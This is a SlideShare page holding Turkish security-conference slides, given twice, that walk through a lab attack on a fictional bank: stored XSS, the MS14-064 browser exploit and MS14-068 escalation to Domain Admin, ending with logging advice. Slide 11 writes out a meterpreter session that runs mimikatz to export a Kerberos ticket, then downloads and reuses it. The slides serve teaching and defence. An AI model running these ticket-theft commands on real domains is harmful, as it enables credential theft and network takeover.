SlideShare una empresa de Scribd logo
1 de 15
Descargar para leer sin conexión
Gerçek Bir Siber Saldırı
Senaryosu ve Analizi
2015 İstanbul / Hilton
Hakkımda
Ozan UÇAR
BGA - Eğitmen & Kıdemli Siber Güvenlik Uzmanı
ozan.ucar@bga.com.tr
twitter.com/ucarozan
blog.bga.com.tr
www.cehturkiye.com
Siber Saldırı Senaryosu
Siber Saldırının Aşamaları - Adım 1
● Saldırgan, www.bgbank.com ziyaretçi
defterinde stored xss zafiyeti bulur.
● Bu açıklığı kullanarak banka kullanıcılarına
zararlı yazılım bulaştırmaya çalışır.
○ XSS 2014 yılında da en çok keşfedilen ve risk
seviyesi yüksek web tabanlı güvenlik zafiyetidir !
Siber Saldırının Aşamaları - Adım 1
Kurban, ziyaretçi defterine
girdiğinde, aynı zamanda
zararlı içerik otomotik olarak
yüklenecek. Kaçarı yok !
Siber Saldırının Aşamaları - Adım 2
● Browser Exploiti ile hedef sisteme yetenekli
ve APT ürünleri ve Antiviruslerce
tanınmayan casus yazılım yerleştirir.
● Bu örnekte IE3-11 sürümlerini etkileyen
MS14-064 exploiti kullanılmıştır.
Siber Saldırının Aşamaları - Adım 2
● Başarılı saldırı sonrası hedef sisteme,
meterpreter casus yazılımı yüklenmiştir.
Siber Saldırının Aşamaları - Adım 3
● Hedef sistemde yetki yükseltmek ve diğer
sistemleri ele geçirmeyek için yeni yöntemler
dener. (örn. MS14-068)
● Domain Admin haklarını elde edince,
windows ortamındaki tüm sistemlere en
yetkili kullanıcı olarak erişim kurar.
Siber Saldırının Aşamaları - Adım 3
Candan, standart
domain user.
DC bilgileri
Siber Saldırının Aşamaları - Adım 3
Siber Saldırının Aşamaları - Adım 3
meterpreter > execute -H -i -c -m -d calc.exe -f /root/Win32/mimikatz.exe -a
'"kerberos::clist C:UserscandanDesktop20150108004448_default_6.6.6.39_windows.
kerberos_933354.bin /export" exit'
meterpreter > download 0-00000000-candan@krbtgt-BGA.LAB.kirbi /root/
meterpreter > use kiwi
Loading extension kiwi…
meterpreter > kerberos_ticket_use /root/0-00000000-candan@krbtgt-BGA.LAB.kirbi
[*] Using Kerberos ticket stored in /root/0-00000000-candan@krbtgt-BGA.LAB.kirbi, 1129
bytes
[+] Kerberos ticket applied successfully
Siber Saldırının Aşamaları - Adım 3
TGT ile oluşturduğu yeni Ticket kısıtlı kullanıcı yetkilerine
sahip kullanıcıyı Domain Admin yetkilerine kavuşturdu.
Hangi İzleri Bıraktık
● XSS Payloadı
● Browser Exploiti
● Casus yazılım ve aracı diğer yazılımlar kurban
bilgisayarın hafızasında çalıştı, dosya sisteminde yok.
● Windows Logları
Hangi İzleri Bıraktık
● Windows Security Kayıtlarından
Kısa Çözüm Önerileri
● Tüm logların kolerasyonu ve
Anlamlandırılması
● Yüksek yetki taleplerini takip etmek
● Aktif ağ cihazlarının (FW,IPS,LGM) beraber
çalışabilirliğini test etmek

Más contenido relacionado

Destacado

Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
BGA Cyber Security
 

Destacado (20)

Hosting Ortamlarında Açık Kaynak Yazılımlar Kullanılarak Saldırı Tespiti ve A...
Hosting Ortamlarında Açık Kaynak Yazılımlar Kullanılarak Saldırı Tespiti ve A...Hosting Ortamlarında Açık Kaynak Yazılımlar Kullanılarak Saldırı Tespiti ve A...
Hosting Ortamlarında Açık Kaynak Yazılımlar Kullanılarak Saldırı Tespiti ve A...
 
8 Ocak 2015 SOME Etkinligi - BGA Bankalar İçin Some Kurulumu
8 Ocak 2015 SOME Etkinligi - BGA Bankalar İçin Some Kurulumu8 Ocak 2015 SOME Etkinligi - BGA Bankalar İçin Some Kurulumu
8 Ocak 2015 SOME Etkinligi - BGA Bankalar İçin Some Kurulumu
 
8 Ocak 2015 SOME Etkinligi - BGA Cyber Security Incident Response Team
8 Ocak 2015 SOME Etkinligi - BGA Cyber Security Incident Response Team8 Ocak 2015 SOME Etkinligi - BGA Cyber Security Incident Response Team
8 Ocak 2015 SOME Etkinligi - BGA Cyber Security Incident Response Team
 
İstSec 2015 - Bilgi Güvenliği için Açık Kaynak ile 360 Derece Alan Hakimiyeti
İstSec 2015 - Bilgi Güvenliği için Açık Kaynak ile 360 Derece Alan HakimiyetiİstSec 2015 - Bilgi Güvenliği için Açık Kaynak ile 360 Derece Alan Hakimiyeti
İstSec 2015 - Bilgi Güvenliği için Açık Kaynak ile 360 Derece Alan Hakimiyeti
 
IOT Güvenliği
IOT GüvenliğiIOT Güvenliği
IOT Güvenliği
 
Bilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma TestleriBilgi Güvenliğinde Sızma Testleri
Bilgi Güvenliğinde Sızma Testleri
 
DDOS ile Saldırı Gizleme "Smoke Screening"
DDOS ile Saldırı Gizleme "Smoke Screening"DDOS ile Saldırı Gizleme "Smoke Screening"
DDOS ile Saldırı Gizleme "Smoke Screening"
 
DDoS Engelleme Ürünleri
DDoS Engelleme ÜrünleriDDoS Engelleme Ürünleri
DDoS Engelleme Ürünleri
 
8 Ocak 2015 SOME Etkinligi - Cisco Next Generation Security
8 Ocak 2015 SOME Etkinligi - Cisco Next Generation Security8 Ocak 2015 SOME Etkinligi - Cisco Next Generation Security
8 Ocak 2015 SOME Etkinligi - Cisco Next Generation Security
 
APT Saldırıları Karşısında Güvenlik Sistemlerin Yetersiziliği
APT Saldırıları Karşısında Güvenlik Sistemlerin YetersiziliğiAPT Saldırıları Karşısında Güvenlik Sistemlerin Yetersiziliği
APT Saldırıları Karşısında Güvenlik Sistemlerin Yetersiziliği
 
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İncelemeBilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
Bilişim Sistemlerinde Adli Bilişim Analizi ve Bilgisayar Olayları İnceleme
 
Siber güvenlik kampı sunumu
Siber güvenlik kampı sunumuSiber güvenlik kampı sunumu
Siber güvenlik kampı sunumu
 
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
BGA BANK Web Güvenlik Testleri Uygulama Kitabı V1
 
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin KullanımıSiber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
Siber Tehdit Gözetleme ve SIEM Olarak Açık Kaynak Sistemlerin Kullanımı
 
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe ÖnalNetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
NetSecTR - "Siem / Log Korelasyon Sunumu" Huzeyfe Önal
 
Siber güvenlik ve hacking
Siber güvenlik ve hackingSiber güvenlik ve hacking
Siber güvenlik ve hacking
 
İstSec 2015 - Siber Saldırılara Hazırlık için Güvenlik Ürünlerimizi Nasıl Tes...
İstSec 2015 - Siber Saldırılara Hazırlık için Güvenlik Ürünlerimizi Nasıl Tes...İstSec 2015 - Siber Saldırılara Hazırlık için Güvenlik Ürünlerimizi Nasıl Tes...
İstSec 2015 - Siber Saldırılara Hazırlık için Güvenlik Ürünlerimizi Nasıl Tes...
 
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama KitabıWeb ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
Web ve Mobil Uygulama Güvenlik Testleri Eğitimi Uygulama Kitabı
 
Man in the Middle Atack (Ortadaki Adam Saldırısı)
Man in the Middle Atack (Ortadaki Adam Saldırısı)Man in the Middle Atack (Ortadaki Adam Saldırısı)
Man in the Middle Atack (Ortadaki Adam Saldırısı)
 
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
Beyaz Şapkalı Hacker CEH Eğitimi - Bölüm 13, 14, 15
 

Más de BGA Cyber Security

Más de BGA Cyber Security (20)

WEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesiWEBSOCKET Protokolünün Derinlemesine İncelenmesi
WEBSOCKET Protokolünün Derinlemesine İncelenmesi
 
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdfTatil Öncesi Güvenlik Kontrol Listesi.pdf
Tatil Öncesi Güvenlik Kontrol Listesi.pdf
 
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık EğitimiÜcretsiz Bilgi Güvenliği Farkındalık Eğitimi
Ücretsiz Bilgi Güvenliği Farkındalık Eğitimi
 
3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?3. parti firma risklerinden nasıl korunulur?
3. parti firma risklerinden nasıl korunulur?
 
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware SaldırılarıBir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
Bir Ransomware Saldırısının Anatomisi. A'dan Z'ye Ransomware Saldırıları
 
Webinar: Popüler black marketler
Webinar: Popüler black marketlerWebinar: Popüler black marketler
Webinar: Popüler black marketler
 
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım SenaryolarıWebinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
Webinar: SOC Ekipleri için MITRE ATT&CK Kullanım Senaryoları
 
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
Açık Kaynak Kodlu Çözümler Kullanarak SOC Yönetimi SOAR & IRM Webinar - 2020
 
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm ÖnerileriDNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
DNS Protokolüne Yönelik Güncel Saldırı Teknikleri & Çözüm Önerileri
 
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini ArttırmakWebinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
Webinar: Siber Güvenlikte Olgunluk Seviyesini Arttırmak
 
Open Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-IIOpen Source Soc Araçları Eğitimi 2020-II
Open Source Soc Araçları Eğitimi 2020-II
 
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner GüvenliğiWebinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
Webinar Sunumu: Saldırı, Savunma ve Loglama Açısından Konteyner Güvenliği
 
Hacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem AnaliziHacklenmiş Windows Sistem Analizi
Hacklenmiş Windows Sistem Analizi
 
Open Source SOC Kurulumu
Open Source SOC KurulumuOpen Source SOC Kurulumu
Open Source SOC Kurulumu
 
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİRAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
RAKAMLARIN DİLİ İLE 2020 YILI SIZMA TESTLERİ
 
Siber Fidye 2020 Raporu
Siber Fidye 2020 RaporuSiber Fidye 2020 Raporu
Siber Fidye 2020 Raporu
 
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing RaporuBGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
BGA Türkiye Bankacılık Sektörü 1. Çeyrek Phishing Raporu
 
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu ÇözümlerSOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
SOC Kurulumu ve Yönetimi İçin Açık Kaynak Kodlu Çözümler
 
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of SecretsVeri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
Veri Sızıntıları İçinden Bilgi Toplama: Distributed Denial of Secrets
 
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi ToplamaAktif Dizin (Active Directory) Güvenlik Testleri - I:  Bilgi Toplama
Aktif Dizin (Active Directory) Güvenlik Testleri - I: Bilgi Toplama
 

8 Ocak 2015 SOME Etkinligi -BGA Gerçek Bir Siber Saldırı Senaryosu ve Analizi

  • 1. Gerçek Bir Siber Saldırı Senaryosu ve Analizi 2015 İstanbul / Hilton
  • 2. Hakkımda Ozan UÇAR BGA - Eğitmen & Kıdemli Siber Güvenlik Uzmanı ozan.ucar@bga.com.tr twitter.com/ucarozan blog.bga.com.tr www.cehturkiye.com
  • 4. Siber Saldırının Aşamaları - Adım 1 ● Saldırgan, www.bgbank.com ziyaretçi defterinde stored xss zafiyeti bulur. ● Bu açıklığı kullanarak banka kullanıcılarına zararlı yazılım bulaştırmaya çalışır. ○ XSS 2014 yılında da en çok keşfedilen ve risk seviyesi yüksek web tabanlı güvenlik zafiyetidir !
  • 5. Siber Saldırının Aşamaları - Adım 1 Kurban, ziyaretçi defterine girdiğinde, aynı zamanda zararlı içerik otomotik olarak yüklenecek. Kaçarı yok !
  • 6. Siber Saldırının Aşamaları - Adım 2 ● Browser Exploiti ile hedef sisteme yetenekli ve APT ürünleri ve Antiviruslerce tanınmayan casus yazılım yerleştirir. ● Bu örnekte IE3-11 sürümlerini etkileyen MS14-064 exploiti kullanılmıştır.
  • 7. Siber Saldırının Aşamaları - Adım 2 ● Başarılı saldırı sonrası hedef sisteme, meterpreter casus yazılımı yüklenmiştir.
  • 8. Siber Saldırının Aşamaları - Adım 3 ● Hedef sistemde yetki yükseltmek ve diğer sistemleri ele geçirmeyek için yeni yöntemler dener. (örn. MS14-068) ● Domain Admin haklarını elde edince, windows ortamındaki tüm sistemlere en yetkili kullanıcı olarak erişim kurar.
  • 9. Siber Saldırının Aşamaları - Adım 3 Candan, standart domain user. DC bilgileri
  • 11. Siber Saldırının Aşamaları - Adım 3 meterpreter > execute -H -i -c -m -d calc.exe -f /root/Win32/mimikatz.exe -a '"kerberos::clist C:UserscandanDesktop20150108004448_default_6.6.6.39_windows. kerberos_933354.bin /export" exit' meterpreter > download 0-00000000-candan@krbtgt-BGA.LAB.kirbi /root/ meterpreter > use kiwi Loading extension kiwi… meterpreter > kerberos_ticket_use /root/0-00000000-candan@krbtgt-BGA.LAB.kirbi [*] Using Kerberos ticket stored in /root/0-00000000-candan@krbtgt-BGA.LAB.kirbi, 1129 bytes [+] Kerberos ticket applied successfully
  • 12. Siber Saldırının Aşamaları - Adım 3 TGT ile oluşturduğu yeni Ticket kısıtlı kullanıcı yetkilerine sahip kullanıcıyı Domain Admin yetkilerine kavuşturdu.
  • 13. Hangi İzleri Bıraktık ● XSS Payloadı ● Browser Exploiti ● Casus yazılım ve aracı diğer yazılımlar kurban bilgisayarın hafızasında çalıştı, dosya sisteminde yok. ● Windows Logları
  • 14. Hangi İzleri Bıraktık ● Windows Security Kayıtlarından
  • 15. Kısa Çözüm Önerileri ● Tüm logların kolerasyonu ve Anlamlandırılması ● Yüksek yetki taleplerini takip etmek ● Aktif ağ cihazlarının (FW,IPS,LGM) beraber çalışabilirliğini test etmek